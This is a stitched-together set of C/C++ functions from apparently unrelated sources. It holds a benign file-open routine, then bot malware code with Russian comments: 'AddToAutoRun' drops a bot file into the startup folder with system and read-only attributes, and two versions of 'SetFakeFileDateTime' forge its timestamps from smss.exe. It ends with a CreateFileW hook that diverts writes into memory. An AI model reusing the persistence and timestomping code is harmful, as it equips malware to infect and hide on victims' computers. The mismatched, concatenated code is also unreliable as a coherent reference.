static void *doOpen(const char *fname, DWORD mode, DWORD creation, int rdonly) { HANDLE fileHandle; WinApiFile *retval; WCHAR *wfname; UTF8_TO_UNICODE_STACK_MACRO(wfname, fname); BAIL_IF_MACRO(wfname == NULL, ERR_OUT_OF_MEMORY, NULL); fileHandle = pCreateFileW(wfname, mode, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, creation, FILE_ATTRIBUTE_NORMAL, NULL); __PHYSFS_smallFree(wfname); BAIL_IF_MACRO ( fileHandle == INVALID_HANDLE_VALUE, winApiStrError(), NULL ); retval = (WinApiFile *) allocator.Malloc(sizeof (WinApiFile)); if (retval == NULL) { CloseHandle(fileHandle); BAIL_MACRO(ERR_OUT_OF_MEMORY, NULL); } /* if */ retval->readonly = rdonly; retval->handle = fileHandle; return(retval); } /* doOpen */
void AddToAutoRun(void *body, DWORD size) { WCHAR *BotPath = GetShellFoldersKey( 1 ); if ( BotPath == NULL ) { return; } plstrcatW( BotPath, BOT_FILE_NAME ); pSetFileAttributesW( BotPath, FILE_ATTRIBUTE_NORMAL ); HANDLE f = pCreateFileW(BotPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); DWORD written = 0; if (f != INVALID_HANDLE_VALUE) { pWriteFile(f, body, size, &written, NULL); pCloseHandle(f); } if (written == size) { SetFakeFileDateTimeW( BotPath ); pSetFileAttributesW( BotPath, FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY ); } MemFree( BotPath ); }
void SetFakeFileDateTime( WCHAR *Path ) { WCHAR smss[] = {'\\','s','m','s','s','.','e','x','e',0}; WCHAR *SysPath = (WCHAR *)MemAlloc( 512 ); if ( SysPath == NULL ) { return; } pGetSystemDirectoryW( SysPath, 512 ); plstrcatW( SysPath, smss ); HANDLE hFile = pCreateFileW( SysPath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ); MemFree( SysPath ); if ( hFile == INVALID_HANDLE_VALUE ) { return; } FILETIME fl1; FILETIME fl2; FILETIME fl3; pGetFileTime( hFile, &fl1, &fl2, &fl3 ); pCloseHandle( hFile ); hFile = pCreateFileW( Path, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ); if ( hFile == INVALID_HANDLE_VALUE ) { return; } pSetFileTime( hFile, &fl1, &fl2, &fl3 ); pCloseHandle( hFile ); return; }
void SetFakeFileDateTime(PCHAR Path) { WCHAR smss[] = {'\\','s','m','s','s','.','e','x','e',0}; // Получаем дату и время системмного файла WCHAR *SysPath = (WCHAR *)MemAlloc( 512 * sizeof(WCHAR) ); if (SysPath == NULL) return; pGetSystemDirectoryW(SysPath, 512); plstrcatW( SysPath, smss ); HANDLE hFile = pCreateFileW( SysPath, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ); MemFree( SysPath ); if ( hFile == INVALID_HANDLE_VALUE ) { return; } FILETIME fl1; FILETIME fl2; FILETIME fl3; pGetFileTime( hFile, &fl1, &fl2, &fl3 ); pCloseHandle( hFile ); // Устанавливаем дату бота hFile = pCreateFileA(Path, GENERIC_WRITE, FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0 ); if ( hFile == INVALID_HANDLE_VALUE ) { return; } pSetFileTime( hFile, &fl1, &fl2, &fl3 ); pCloseHandle( hFile ); return; }
HANDLE WINAPI MyCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile ) { CString strFileName; strFileName = lpFileName; strFileName.MakeLower(); if (g_bEnableWriteDisk) { goto Pass; } CMemFileObject *pMemFileObj = NULL; FMemRecord.GetRecordData(strFileName,&pMemFileObj); BOOL bCanCreate = TRUE; g_DebugLock.Lock(); bCanCreate = nCurMemUse < MAX_MEM_FILE_SIZE; g_DebugLock.UnLock(); if ( strFileName.Find(L"msimgsiz.dat") >= 0 || strFileName.Find(L"cryptneturlcache") >=0 || strFileName.Find(L"\\temp\\") >=0 ) { return INVALID_HANDLE_VALUE; } if ( NULL == pMemFileObj && bCanCreate ) { BOOL bPreExist = PathFileExists(lpFileName); if( FALSE == bPreExist //之前文件不存在 && !( lpFileName[0] == L'\\' && lpFileName[1] == L'\\') //不是驱动对象 && (dwCreationDisposition&CREATE_ALWAYS || dwCreationDisposition&CREATE_NEW) //想要创建新的文件 && GENERIC_WRITE&dwDesiredAccess //需要写文件 ) { pMemFileObj = new CMemFileObject(lpFileName); FMemRecord.AddRecord(strFileName,pMemFileObj); #if defined(DEBUG) || defined(_DEBUG) CString strMsgOut; strMsgOut.Format(L"创建内存文件:%s\n",strFileName); OutputDebugStringW(strMsgOut); #endif } } if (pMemFileObj) { HANDLE hFalseHandle = GetFalseHandle(); CUserFileObject *pUserFileObj = new CUserFileObject(hFalseHandle,pMemFileObj,dwShareMode&FILE_SHARE_DELETE); FRecord.AddRecord(hFalseHandle,pUserFileObj); #if defined(DEBUG) || defined(_DEBUG) CString strMsgOut; strMsgOut.Format(L"创建伪文件 Share %d Flag %d Handle 0x%x Path:%s\n",dwShareMode,dwFlagsAndAttributes,hFalseHandle,strFileName); OutputDebugStringW(strMsgOut); #endif return hFalseHandle; } Pass: return pCreateFileW( lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile ); }